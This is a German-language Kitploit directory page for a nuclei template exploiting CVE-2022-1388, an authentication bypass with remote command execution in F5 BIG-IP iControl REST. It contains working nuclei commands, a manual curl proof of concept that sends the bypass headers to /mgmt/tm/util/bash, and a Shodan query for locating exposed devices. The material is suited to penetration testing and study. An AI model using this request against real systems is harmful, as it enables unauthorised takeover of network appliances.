Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter — CVE-2022-1388 ist eine Schwachstelle zur Umgehung der Authentifizierung in der REST-Komponente der iControl-API von BIG-IP, der ein CVSSv3-Score von 9.8 zugewiesen wurde. Die iControl-REST-API wird für die Verwaltung und Konfiguration von BIG-IP-Geräten verwendet. CVE-2022-1388 könnte von einem nicht authentifizierten Angreifer mit Netzwerkzugriff auf den Verwaltungsport oder die Self-IP-Adressen von Geräten, die BIG-IP verwenden, ausgenutzt werden. Eine Ausnutzung würde es dem Angreifer ermöglichen, beliebige Systembefehle auszuführen, Dateien zu erstellen und zu löschen sowie Dienste zu deaktivieren. | Kitploit
Tools/GitHubGitHub/mrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubmrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter

Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter

Repository anzeigen
62vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

CVE-2022-1388 ist eine Schwachstelle zur Umgehung der Authentifizierung in der REST-Komponente der iControl-API von BIG-IP, der ein CVSSv3-Score von 9.8 zugewiesen wurde. Die iControl-REST-API wird für die Verwaltung und Konfiguration von BIG-IP-Geräten verwendet. CVE-2022-1388 könnte von einem nicht authentifizierten Angreifer mit Netzwerkzugriff auf den Verwaltungsport oder die Self-IP-Adressen von Geräten, die BIG-IP verwenden, ausgenutzt werden. Eine Ausnutzung würde es dem Angreifer ermöglichen, beliebige Systembefehle auszuführen, Dateien zu erstellen und zu löschen sowie Dienste zu deaktivieren.

Teilen

Nuclei-Exploit-Vorlage für F5 BIG-IP iControl REST Auth Bypass RCE | Befehlsparameter

CVE-2022-1388 ist eine Authentifizierungsumgehungs-Schwachstelle in der REST-Komponente der iControl-API von BIG-IP, der ein CVSSv3-Score von 9,8 zugewiesen wurde. Die iControl REST API wird für die Verwaltung und Konfiguration von BIG-IP-Geräten verwendet. CVE-2022-1388 könnte von einem nicht authentifizierten Angreifer mit Netzwerkzugriff auf den Verwaltungsport oder die Selbst-IP-Adressen von Geräten, die BIG-IP verwenden, ausgenutzt werden. Eine Ausnutzung würde es dem Angreifer ermöglichen, beliebige Systembefehle auszuführen, Dateien zu erstellen und zu löschen sowie Dienste zu deaktivieren.

Diese Vorlage verwendet token-spray / nuclei CLI-Variable

Diese nuclei-Vorlage akzeptiert Shell-Parameter zur Ausnutzung. Wir wollten Tokens testen, die aus einem anderen Workflow oder einer manuellen Suche stammen, und haben daher die CLI-Variablenfunktion von nuclei verwendet, um zur Laufzeit dynamisch einen einzelnen Token-Wert oder eine Liste von Tokens in diese Vorlagen einzuspeisen.

-V, -var value benutzerdefinierte Variablen im Format var=value

root@kitploit:~
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

Screenshot von 2022-05-10 01-28-12

Manueller POC

root@kitploit:~
curl -su admin \ 
-H "Host: localhost:8100" \ 
-H "Content-Type: application/json" \ 
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \ 
-H "Authorization: Basic YWRtaW46" \
 http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'

Zusätzliche Details

  • https://www.shodan.io/search?query=http.title%3A%22BIG-IP%26reg%3B-+Redirect%22

Referenzen

  • https://blog.projectdiscovery.io/nuclei-v2-5-release/
  • https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  • https://github.com/alt3kx/CVE-2022-1388_PoC
  • https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md
  • https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py
  • https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.y
  • https://github.com/tenable/audit_files/tree/master/cve-2022-1388
  • https://support.f5.com/csp/article/K23605346
  • https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html
  • https://twitter.com/1ZRR4H/status/1522165718975922178
  • https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ip
Tool herunterladen